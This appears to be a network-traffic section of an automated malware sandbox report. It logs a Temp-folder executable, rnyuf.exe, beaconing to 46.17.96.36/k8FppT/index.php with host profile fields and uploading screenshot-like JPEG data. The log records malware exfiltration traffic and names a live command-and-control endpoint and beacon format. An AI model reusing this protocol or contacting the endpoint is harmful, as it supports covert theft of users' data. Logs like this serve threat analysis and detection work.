                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:23.019571066 CEST4057OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:23.019896984 CEST4080OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:23.054934025 CEST4082OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:23.055016994 CEST4092OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:23.055061102 CEST4098OUTData Raw: a6 5e 1f f4 d9 bf df 34 fd 13 9d 5a 1f ad 47 79 ff 00 1f b3 7f be 6b 9f fe 5f 3f 42 e5 fc 2f 99 0d 06 81 41 ad 8e 71 69 45 34 75 a7 50 21 68 a2 8a 42 16 8e f4 51 48 43 85 14 dc d2 83 48 05 a2 8a 28 10 b4 51 45 00 2d 2d 25 02 90 87 53 d3 ef 0a 8e
                                        Data Ascii: ^4ZGyk_?B/AqiE4uP!hBQHCH(QE--%S:`[N<cyy^/,f@*[:2ra~+_b4fNKNOA8RRfMe!Gjx-)RNZ*@i9!SC-p
                                        Aug 29, 2021 22:27:23.055257082 CEST4117OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:27:23.055311918 CEST4130OUTData Raw: 8b 23 4b 57 3f bb 91 1b e8 e0 d3 0e 93 27 a3 81 ea 56 98 10 9e d5 66 18 6e 38 d8 5d 7e 87 15 0d ce 3d 4a 8c 94 b6 45 53 a5 cd fc 3b 4f d4 e2 98 da 65 d0 ff 00 96 4c 7d c5 6f c1 0d e1 c6 66 63 ec 79 ad 6b 68 2e 4e 32 a8 df 55 ac 27 8b 94 0e da 58
                                        Data Ascii: #KW?'Vfn8]~=JES;OeL}ofcykh.N2U'XgS&3nk<=b}0`htvG'=$&MbS*:fk s4*eA~"5b)Y#sC$:Xl,|Ju6t?;5dUgO
                                        Aug 29, 2021 22:27:23.172096014 CEST4149INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        280192.168.2.45001946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:59.546881914 CEST17263OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:59.625637054 CEST17277INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        281192.168.2.45002046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:59.600308895 CEST17264OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:59.600398064 CEST17264OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:59.600589991 CEST17274OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:59.600696087 CEST17277OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:59.635679960 CEST17280OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:59.635735035 CEST17282OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:59.635747910 CEST17285OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:59.635876894 CEST17297OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:59.635956049 CEST17302OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:59.670979977 CEST17305OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:59.671020031 CEST17313OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:59.800431967 CEST17372INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        282192.168.2.45002146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:59.826787949 CEST17373OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:59.921061993 CEST17373INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        283192.168.2.45002246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:00.381589890 CEST17374OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:00.455825090 CEST17464INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        284192.168.2.45002346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:00.386209011 CEST17374OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:00.386317015 CEST17375OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:00.386506081 CEST17385OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:00.386639118 CEST17387OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:00.420011997 CEST17390OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:00.420064926 CEST17404OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:00.420201063 CEST17408OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:29:00.420238018 CEST17413OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:00.452260971 CEST17416OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:29:00.452297926 CEST17419OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:29:00.452313900 CEST17429OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:29:00.551465988 CEST17482INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        285192.168.2.45002446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:00.696636915 CEST17483OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:00.767625093 CEST17483INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        286192.168.2.45002546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:00.909743071 CEST17484OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:00.909892082 CEST17484OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:00.910073996 CEST17494OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:00.910172939 CEST17497OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:00.942370892 CEST17500OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:00.942418098 CEST17503OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
